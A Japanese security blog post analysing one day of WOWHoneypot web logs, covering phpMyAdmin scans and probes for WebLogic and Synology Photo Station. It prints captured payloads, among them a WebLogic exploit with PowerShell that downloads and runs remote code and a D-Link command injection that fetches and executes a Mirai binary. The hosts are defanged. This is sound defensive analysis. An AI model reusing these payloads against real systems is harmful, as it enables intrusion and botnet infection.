S-Owl

S(ecurity)Owl

トップ > honeypot > WOWHoneypot簡易分析(12日目)

WOWHoneypot簡易分析(12日目)

honeypot

WOWhoneypotの2018/6/15(金)(運用12日目)の簡易分析です。

アクセス件数は272件です。

$ awk '/06-15/{print $1,$5,$6}' access_log | sort | uniq -c | sort -nr
120 [2018-06-15 "GET /
65 [2018-06-15 "HEAD /
3 [2018-06-15 "GET /phpMyAdmin/phpMyAdmin/index.php
3 [2018-06-15 "GET /phpmyadmin/phpmyadmin/index.php
3 [2018-06-15 "GET /phpma/index.php
2 [2018-06-15 "GET /xampp/phpmyadmin/index.php
2 [2018-06-15 "GET /www/phpMyAdmin/index.php
2 [2018-06-15 "GET /web/phpMyAdmin/index.php
2 [2018-06-15 "GET /typo3/phpmyadmin/index.php
2 [2018-06-15 "GET /tools/phpMyAdmin/index.php
2 [2018-06-15 "GET /pmd/index.php
2 [2018-06-15 "GET /pma-old/index.php
2 [2018-06-15 "GET /pmamy/index.php
2 [2018-06-15 "GET /pmamy2/index.php
2 [2018-06-15 "GET /PMA/index.php
2 [2018-06-15 "GET /pma/index.php
2 [2018-06-15 "GET /PMA2/index.php
2 [2018-06-15 "GET /phpMyAdminold/index.php
2 [2018-06-15 "GET /phpMyAdmin.old/index.php
2 [2018-06-15 "GET /phpmyadmin-old/index.php
2 [2018-06-15 "GET /phpMyAdmin/index.php
2 [2018-06-15 "GET /phpmyadmin/index.php
2 [2018-06-15 "GET /phpMyadmin_bak/index.php
2 [2018-06-15 "GET /phpmyadmin2/index.php
2 [2018-06-15 "GET /phpmyadmin1/index.php
2 [2018-06-15 "GET /phpmyadmin0/index.php
2 [2018-06-15 "GET /phpadmin/index.php
2 [2018-06-15 "GET /mysql/index.php
2 [2018-06-15 "GET /mysqladmin/index.php
2 [2018-06-15 "GET /mysql-admin/index.php
2 [2018-06-15 "GET /myadmin/index.php
2 [2018-06-15 "GET /myadmin2/index.php
2 [2018-06-15 "GET /index.php
2 [2018-06-15 "GET /db/index.php
2 [2018-06-15 "GET /dbadmin/index.php
2 [2018-06-15 "GET /claroline/phpMyAdmin/index.php
2 [2018-06-15 "GET /admin/PMA/index.php
2 [2018-06-15 "GET /admin/pma/index.php
2 [2018-06-15 "GET /admin/phpMyAdmin/index.php
2 [2018-06-15 "GET /admin/phpmyadmin/index.php
2 [2018-06-15 "GET /admin/phpmyadmin2/index.php
2 [2018-06-15 "GET /admin/mysql/index.php
2 [2018-06-15 "GET /admin/mysql2/index.php
2 [2018-06-15 "GET /admin/index.php
1 [2018-06-15 "PROPFIND /
1 [2018-06-15 "POST /wls-wsat/CoordinatorPortType
1 [2018-06-15 "GET /photo/webapi/album.php
1 [2018-06-15 "GET /login.cgi?cli=aa%20aa%27;wget%20hxxp://185.62.190[.]191/r%20-O%20-%3E%20/tmp/r;sh%20/tmp/r%27$
1 [2018-06-15 "GET /console/login/LoginForm.jsp

いつも通りphpmyadmin関連と思われるindex.phpを省きます。

$ awk '/06-15/{print $1,$5,$6}' access_log | sort | uniq -c | sort -nr | grep -v index.php
120 [2018-06-15 "GET /
65 [2018-06-15 "HEAD /
1 [2018-06-15 "PROPFIND /
1 [2018-06-15 "POST /wls-wsat/CoordinatorPortType
1 [2018-06-15 "GET /photo/webapi/album.php
1 [2018-06-15 "GET /login.cgi?cli=aa%20aa%27;wget%20hxxp://185.62.190[.]191/r%20-O%20-%3E%20/tmp/r;sh%20/tmp/r%27$
1 [2018-06-15 "GET /console/login/LoginForm.jsp

見るべき数は4つに減りました。

1.まずはいつものWeblogic脆弱性(/wls-wsat/)を突くものを見ます。

$ awk '/06-15/{print $1,$5,$6,$10}' access_log | grep wls | awk '{print $4}' | base64 -d | grep -o 'Hidden.*' | awk '{pr
int $3}' | base64 -d
$OS=(GWmi Win32_OperatingSystem).Caption;$WC=New-Object Net.WebClient;$WC.Headers['User-Agent']="PowerShell/WL $OS";IEX $WC.DownloadString('hxxp://101.200.45[.]78/images/test/DL.php');

アクセス先が'hxxp://120.25.148[.]202/images/test/DL.phpからhxxp://101.200.45[.]78/images/test/DL.phpに変わりましたが、それ以外は同じです。

2.次はphotoのパスのものです。

$ awk '/06-15/{print $1,$5,$6,$10}' access_log | grep photo | awk '{print $4}' | base64 -d
GET /photo/webapi/album.php HTTP/1.0
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:19.0) Gecko/20100101 Firefox/19.0
Referer: hxxp://(wow-ip):80/photo/webapi/album.php

このパスはSynology社の Photo Station というアプリケーションのようです。
このアプリケーションに関する脆弱性が2018/5/18にJVDが公開されています。

JVNDB-2017-013004 - JVN iPedia - 脆弱性対策情報データベース

企業のサイトでは1月に任意のコード実行として脆弱性が出ています。

Synology-SA-18:02 Photo Station | Synology Inc.

攻撃的なペイロードが来ていないため、存在確認の調査行為と思われます。

3.LoginFormのパスに来ているものです。

$ awk '/06-15/{print $1,$5,$6,$10}' /var/log/wowhoneypot/access_log | grep Form | awk '{print $4}' | base64 -d
GET /console/login/LoginForm.jsp HTTP/1.0
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:19.0) Gecko/20100101 Firefox/19.0
Referer: hxxp://(wow-ip):80/console/login/LoginForm.jsp

このパスはWebgicの管理コンソールのログイン画面です。デフォルトでは7001番ポートで空いています。
アクセス内容は普通ですので、このパスが外部に公開されているかを調査しているものと思われます。

4.最後にwgetしているものを見ます。

$ awk '/06-15/{print $1,$5,$6,$10}' /var/log/wowhoneypot/access_log | grep wget | awk '{print $4}' | base64 -d

GET /login.cgi?cli=aa aa';wget hxxp://185.62.190[.]191/r -O -> /tmp/r;sh /tmp/r'$ HTTP/1.1
Host: 127.0.0.1
Connection: keep-alive
Accept-Encoding: gzip, deflate
Accept: */*
User-Agent: Hello, World

パスはD-Linkの脆弱性に関するもののようです。
 rというファイルを取得して実行するようです。hashを調べるとLinux/Miraiと判定されます。
https://www.virustotal.com/#/url/cc060376ec00e56abb028826d4ecdfd334c994ab04f353a05faf7b823be84ef7/detection
https://www.virustotal.com/#/file/7caac9c9fa954730665d63b692119ba5f14ee6c07cf11ffc60bca7b3d25ea109/deptection
https://www.hybrid-analysis.com/sample/b8ede54719f9b5bb55dce76a1acd5adbc9a56b8e5950a3d3fc038fc9d42e2da0/5b24f6677ca3e11b1a1b321b

最近注意喚起のあった80番ポートに対するMirai亜種というものかも知れません。

http://www.npa.go.jp/cyberpolice/detect/pdf/20180613.pdf

 

ハンティングログは以下で、先程のものです。

[2018-06-15 hxxp://185.62.190[.]191/r

以上です。